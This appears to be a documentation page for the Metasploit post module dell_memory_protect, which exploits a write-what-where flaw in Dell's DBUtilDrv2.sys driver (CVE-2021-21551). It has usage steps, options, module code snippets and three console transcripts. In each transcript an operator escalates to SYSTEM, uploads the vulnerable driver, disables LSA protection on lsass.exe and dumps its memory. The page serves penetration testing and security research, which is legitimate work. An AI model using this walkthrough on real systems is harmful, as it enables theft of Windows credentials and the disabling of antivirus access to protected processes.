Dell DBUtilDrv2.sys Memory Protection Modifier - Metasploit
This page contains detailed information about how to use the post/windows/manage/dell_memory_protect metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Dell DBUtilDrv2.sys Memory Protection Modifier
Module: post/windows/manage/dell_memory_protect
Source code: modules/post/windows/manage/dell_memory_protect.rb
Disclosure date: -
Last modification time: 2021-12-18 10:56:46 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-21551
The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition that allows an attacker to read and write arbitrary kernel-mode memory. This module installs the provided driver, enables or disables LSA protection on the provided PID, and then removes the driver. This would allow, for example, dumping LSASS memory even when secureboot is enabled or preventing antivirus from accessing the memory of a chosen PID. The affected drivers are not distributed with Metasploit. You will truly need to Bring Your Own (Dell) Driver.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Stability:
- crash-os-restarts: Module may crash the OS, but the OS restarts.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/manage/dell_memory_protect
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/manage/dell_memory_protect
msf post(dell_memory_protect) > show options
... show and set options ...
msf post(dell_memory_protect) > set SESSION session-id
msf post(dell_memory_protect) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/manage/dell_memory_protect")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
The Dell driver dbutil_2_3.sys was affected by a local privilege escalation issue due to a write-what-where condition exposed by a few of the driver's IOCTLs. This was assigned CVE-2021-21551. Dell "fixed" this issue by deprecating dbutil_2_3.sys and switching to DBUtilDrv2.sys. The new driver prevent low privileged users from interacting with the driver but did not fix the write-what-where condition.
This module leverages the write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). This would allow, for example, dumping LSASS memory even when Secure Boot and RunAsPPL are enabled. Or, as another example, allow an attacker to prevent antivirus from accessing the memory of a chosen process.
The Dell drivers are not distributed with Metasploit. The user must truly BYOVD and upload the driver and installation files to the target system themselves. The module will install, exploit, and remove the driver. Both installing the driver and dumping memory require high privileged accounts. The following is the required files per version and their hashes:
dbutildrv2.sys version 2.5
- DBUtilDrv2.cat - 23bbc48543a46676c5cb5e33a202d261a33704fe
- dbutildrv2.inf - c40ebb395cb79c3cf7ca00f59f4dc17930435fc5
- DBUtilDrv2.sys - 90a76945fd2fa45fab2b7bcfdaf6563595f94891
dbutildrv2.sys version 2.7
- DBUtilDrv2.cat - 06f2b629e7303ac1254b52ec0560c34d72b46155
- dbutildrv2.inf - 19f8da3fe9ddbc067e3715d15aed7a6530732ab5
- DBUtilDrv2.sys - b03b1996a40bfea72e4584b82f6b845c503a9748
- WdfCoInstaller01009.dll - c1e821b156dbc3feb8a2db4fdb9cf1f5a8d1be6b
See scenarios
below for an example.
Supported Targets
- Windows 10 x64 v1507 - v19044 (21H2)
- Windows 11 x64 21H2
- Windows Server 2016 x64 v1607 - v1709
- Windows Server 2019 x64 v1909 - v2009 (20H2)
The targets must have UEFI or Secure Boot enabled and the RunAsPPL registry key should be configured.
Options
DRIVER_PATH
The path on the RHOST containing the driver inf, cat, and sys (and coinstaller depending on the version). For example,
in the scenarios below, the driver files are uploaded to C:\Windows\Temp
, so this should be set DRIVER_PATH C:\\Windows\\Temp
.
ENABLE_MEM_PROTECT
Enable or disable memory protection on the targetted process. false
will remove memory protection and true
will enable it.
PID
The ID of the targetted process. If set to 0 (the default value), the module will automatically find lsass.exe.
Verification Steps
- Start msfconsole
- Get a system Meterpreter session on a host using UEFI or Secure Boot and configured with RunAsPPL.
- Obtain the pid of lsass.exe:
ps | grep lsass
- Background the session
- Do:
post/windows/gather/memory_dump
- Set the
SESSION
,PID
, andDUMP_PATH
options. - Do:
run
- Observe a permission denied error.
- Return to the previous session:
sessions -i 1
- Upload the required driver files:
upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp\\
- Background the session
- Do:
use post/windows/manage/dell_memory_protect
- Set the
SESSION
,PID
, andDRIVER_PATH
(e.g.C:\\Windows\\Temp
) options. - Do:
run
- Observe the module exits successfully.
- Do:
post/windows/gather/memory_dump
- Do:
run
- Observe the successful memory dump of lsass
Scenarios
Windows 11 Build 22000.348 x64 using DBUtilDrv2 version 2.7
[*] Started reverse TCP handler on 10.0.0.9:1270
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:47730 ) at 2021-12-07 12:48:57 -0800
meterpreter > sysinfo
Computer : BADBLOOD
OS : Windows 10 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: badblood\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
740 572 lsass.exe x64 0
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options
Module options (post/windows/gather/memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH yes File to write memory dump to
DUMP_TYPE standard yes Minidump size (Accepted: standard, full)
PID yes ID of the process to dump memory from
SESSION yes The session to run this module on
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 740
PID => 740
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run
[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp
[*] uploading : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploaded : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploading : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploaded : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploading : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploaded : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploading : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
[*] uploaded : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > options
Module options (post/windows/manage/dell_memory_protect):
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVER_PATH yes The path containing the driver inf, cat, and sys (and coinstaller)
ENABLE_MEM_PROTECT false yes Enable or disable memory protection
PID yes The targetted process
SESSION yes The session to run this module on
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp
DRIVER_PATH => C:\Windows\Temp
msf6 post(windows/manage/dell_memory_protect) > set PID 740
PID => 740
msf6 post(windows/manage/dell_memory_protect) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 692 launched.
[*] Reflectively injecting the DLL into 692...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options
Module options (post/windows/gather/memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Windows\Temp\lsass_dump yes File to write memory dump to
DUMP_TYPE standard yes Minidump size (Accepted: standard, full)
PID 740 yes ID of the process to dump memory from
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/memory_dump) > run
[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.11 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211207125102_default_172.16.144.11_windows.process._368616.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >
Windows 10 Build 19044.1348 x64 using DBUtilDrv2 version 2.5
[*] Started reverse TCP handler on 10.0.0.9:1270
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:39523 ) at 2021-12-08 07:18:27 -0800
meterpreter > sysinfo
Computer : DESKTOP-JCD6JN8
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-JCD6JN8\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
732 568 lsass.exe x64 0
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 732
PID => 732
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run
[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set PID 732
PID => 732
msf6 post(windows/manage/dell_memory_protect) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 3508 launched.
[*] Reflectively injecting the DLL into 3508...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > run
[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.93 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211208072121_default_172.16.144.6_windows.process._495675.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >
Windows Server 2016 (10.0.14393) x64 using DBUtilDrv2 version 2.5 and PID option set to 0
[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.8:45172 ) at 2021-12-18 04:12:03 -0800
meterpreter > sysinfo
Computer : WIN-7ESIGFVFQEG
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN-7ESIGFVFQEG\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
664 504 lsass.exe x64 0
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSIOn 1
SESSIOn => 1
msf6 post(windows/gather/memory_dump) > set PID 664
PID => 664
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run
[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > run
[*] Set PID option 664 for lsass.exe
[*] Launching netsh to host the DLL...
[+] Process 3008 launched.
[*] Reflectively injecting the DLL into 3008...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > run
[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.70 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211218041511_default_172.16.144.14_windows.process._536152.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >
Go back to menu.
Msfconsole Usage
Here is how the windows/manage/dell_memory_protect post exploitation module looks in the msfconsole:
msf6 > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > show info
Name: Dell DBUtilDrv2.sys Memory Protection Modifier
Module: post/windows/manage/dell_memory_protect
Platform: Windows
Arch:
Rank: Manual
Provided by:
SentinelLabs
Kasif Dekel
Red Cursor
Jacob Baines
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-os-restarts
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVER_PATH yes The path containing the driver inf, cat, and sys (and coinstaller)
ENABLE_MEM_PROTECT false yes Enable or disable memory protection
PID 0 yes The targetted process. If set to 0 the module will automatically target lsass.exe
SESSION yes The session to run this module on
Description:
The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a
write-what-where condition that allows an attacker to read and write
arbitrary kernel-mode memory. This module installs the provided
driver, enables or disables LSA protection on the provided PID, and
then removes the driver. This would allow, for example, dumping
LSASS memory even when secureboot is enabled or preventing antivirus
from accessing the memory of a chosen PID. The affected drivers are
not distributed with Metasploit. You will truly need to Bring Your
Own (Dell) Driver.
References:
https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
https://itm4n.github.io/lsass-runasppl/
https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93
https://github.com/RedCursorSecurityConsulting/PPLKiller
https://github.com/jbaines-r7/dellicious
Module Options
This is a complete list of options available in the windows/manage/dell_memory_protect post exploitation module:
msf6 post(windows/manage/dell_memory_protect) > show options
Module options (post/windows/manage/dell_memory_protect):
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVER_PATH yes The path containing the driver inf, cat, and sys (and coinstaller)
ENABLE_MEM_PROTECT false yes Enable or disable memory protection
PID 0 yes The targetted process. If set to 0 the module will automatically target lsass.exe
SESSION yes The session to run this module on
Advanced Options
Here is a complete list of advanced options supported by the windows/manage/dell_memory_protect post exploitation module:
msf6 post(windows/manage/dell_memory_protect) > show advanced
Module advanced options (post/windows/manage/dell_memory_protect):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/manage/dell_memory_protect module can do:
msf6 post(windows/manage/dell_memory_protect) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/manage/dell_memory_protect post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/manage/dell_memory_protect) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target is not Windows. Found <SYSINFO_VALUE>
Here is a relevant code snippet related to the "Target is not Windows. Found <SYSINFO_VALUE>" error message:
62: end
63:
64: def get_eproc_offsets
65: sysinfo_value = sysinfo['OS']
66: unless sysinfo_value =~ /Windows/
67: print_status("Target is not Windows. Found #{sysinfo_value}")
68: return nil
69: end
70:
71: build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
72: vprint_status("Windows Build Number = #{build_num}")
Elevated session is required
Here is a relevant code snippet related to the "Elevated session is required" error message:
97: return offsets[build_num]
98: end
99:
100: def run
101: unless is_system?
102: fail_with(Failure::None, 'Elevated session is required')
103: end
104:
105: offsets = get_eproc_offsets
106: if offsets.nil?
107: fail_with(Failure::NoTarget, 'Unsupported targeted')
Unsupported targeted
Here is a relevant code snippet related to the "Unsupported targeted" error message:
102: fail_with(Failure::None, 'Elevated session is required')
103: end
104:
105: offsets = get_eproc_offsets
106: if offsets.nil?
107: fail_with(Failure::NoTarget, 'Unsupported targeted')
108: end
109:
110: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112: end
Running against WOW64 is not supported
Here is a relevant code snippet related to the "Running against WOW64 is not supported" error message:
106: if offsets.nil?
107: fail_with(Failure::NoTarget, 'Unsupported targeted')
108: end
109:
110: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112: end
113:
114: unless datastore['DRIVER_PATH'].include? '\\'
115: fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")
116: end
The driver path must be a file path. User provided: <DRIVER_PATH>
Here is a relevant code snippet related to the "The driver path must be a file path. User provided: <DRIVER_PATH>" error message:
110: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112: end
113:
114: unless datastore['DRIVER_PATH'].include? '\\'
115: fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")
116: end
117:
118: # If the user doesn't select a PID select lsass.exe for them
119: target_pid = datastore['PID']
120: if target_pid == 0
Go back to menu.
Related Pull Requests
References
- CVE: Not available
- https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
- https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
- https://itm4n.github.io/lsass-runasppl/
- https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
- https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93
- https://github.com/RedCursorSecurityConsulting/PPLKiller
- https://github.com/jbaines-r7/dellicious
See Also
Check also the following modules related to this module:
- post/windows/manage/add_user
- post/windows/manage/archmigrate
- post/windows/manage/change_password
- post/windows/manage/clone_proxy_settings
- post/windows/manage/delete_user
- post/windows/manage/download_exec
- post/windows/manage/driver_loader
- post/windows/manage/enable_rdp
- post/windows/manage/enable_support_account
- post/windows/manage/exec_powershell
- post/windows/manage/execute_dotnet_assembly
- post/windows/manage/forward_pageant
- post/windows/manage/hashcarve
- post/windows/manage/ie_proxypac
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/install_python
- post/windows/manage/install_ssh
- post/windows/manage/killav
- post/windows/manage/migrate
- post/windows/manage/mssql_local_auth_bypass
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
- post/windows/manage/peinjector
- post/windows/manage/persistence_exe
- post/windows/manage/portproxy
- post/windows/manage/pptp_tunnel
- post/windows/manage/priv_migrate
- post/windows/manage/pxeexploit
- post/windows/manage/reflective_dll_inject
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/windows/manage/rid_hijack
- post/windows/manage/rollback_defender_signatures
- post/windows/manage/rpcapd_start
- post/windows/manage/run_as
- post/windows/manage/run_as_psh
- post/windows/manage/sdel
- post/windows/manage/shellcode_inject
- post/windows/manage/sshkey_persistence
- post/windows/manage/sticky_keys
- post/windows/manage/vmdk_mount
- post/windows/manage/vss
- post/windows/manage/vss_create
- post/windows/manage/vss_list
- post/windows/manage/vss_mount
- post/windows/manage/vss_set_storage
- post/windows/manage/vss_storage
- post/windows/manage/wdigest_caching
- post/windows/manage/webcam
Related Nessus plugins:
Authors
- SentinelLabs
- Kasif Dekel
- Red Cursor
- Jacob Baines
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.